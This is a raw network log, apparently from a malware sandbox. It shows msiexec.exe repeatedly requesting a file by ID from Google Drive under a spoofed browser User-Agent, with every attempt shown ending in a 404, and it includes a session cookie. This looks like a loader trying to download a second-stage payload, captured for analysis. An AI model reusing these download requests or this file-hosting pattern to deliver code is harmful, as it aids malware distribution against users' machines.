                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-GCt8a1EMFLT0icOAQdxo4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49721 | 142.250.185.193 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:46:45 UTC | 258 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
2025-03-07 21:46:46 UTC | 1926 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIsWxfJ9ep40jMuJCWE3_iCcz-DTfuJi2zEY8NZNzPtQZbfn0LlTuGhDL7XqGo7VQNVKWCgj5Q0
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:46 GMT
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-TIrMSrD2oFzpFFAenjnG7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Set-Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw; expires=Sat, 06-Sep-2025 21:46:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
2025-03-07 21:46:46 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 75 57 47 6c 4a 77 45 76 64 61 70 4e 78 4a 6f 57 63 58 55 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4uWGlJwEvdapNxJoWcXUkA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49722 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:46:49 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:46:50 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-elMAxi0WhXOIaA-QOg5Srg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49723 | 142.250.185.193 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:46:52 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:46:53 UTC | 1541 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIv022PTTz3J0-uwB5i7bBoFDqbBWHxyxDaTOjVD5DelXQ9gqCZTIIhsW6smB8SGSpnj3hd7Mgc
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:52 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-J5C8yTdoURX0iLq7NFAb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
2025-03-07 21:46:53 UTC | 1541 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4b 53 6c 69 79 6c 72 35 33 42 74 59 61 43 4e 34 70 54 6e 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKSliylr53BtYaCN4pTnMA">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-03-07 21:46:53 UTC | 111 | IN | Data Raw: 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: ts an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49724 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:46:55 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:46:56 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:55 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-RK-ZfWTEhQfdsx8x1esFfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
5          | 192.168.2.4 | 49725       | 142.250.185.193 | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:46:58 UTC | 470               | OUT       | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:46:59 UTC | 1534              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AKDAyItTnDh5ERL3h_ztKlKSHNqyfJYtgoYRbkq0LKDEV2O5ggjBZ0Hvy1vD1oo8crzpGMq_
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:46:58 GMT
    Content-Security-Policy: script-src 'nonce-FxrxZZ4bXMxs2Jsie4atMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-03-07 21:46:59 UTC | 1534              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N0dzwuqsTaqL1TMqvzreAw">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-03-07 21:46:59 UTC | 118               | IN        | Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49726       | 216.58.206.78  | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:47:01 UTC | 428               | OUT       | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:47:02 UTC | 1610              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:47:02 GMT
    Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'nonce-VJDAK6oj_FEvwo7Qa8JIDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
7          | 192.168.2.4 | 49727       | 142.250.185.193 | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:47:04 UTC | 470               | OUT       | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:47:05 UTC | 1534              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AKDAyIsaoa32c76A-_xqUbVnoDoVflbdZHIuptV1S_uXAkeBKmBP9n9j5eQnusSpXTfwbdbS
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:47:05 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-BizmiIQQApVJFRixZbwTPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-03-07 21:47:05 UTC | 1534              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X_JG069ucguhf5uElIE_gw">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-03-07 21:47:05 UTC | 118               | IN        | Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.4 | 49728       | 216.58.206.78  | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:47:07 UTC | 428               | OUT       | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:47:08 UTC | 1610              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:47:08 GMT
    Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-0JYIV1XXIPnb3sDGi6nT3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
9          | 192.168.2.4 | 49729       | 142.250.185.193 | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:47:10 UTC | 470               | OUT       | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Cache-Control: no-cache
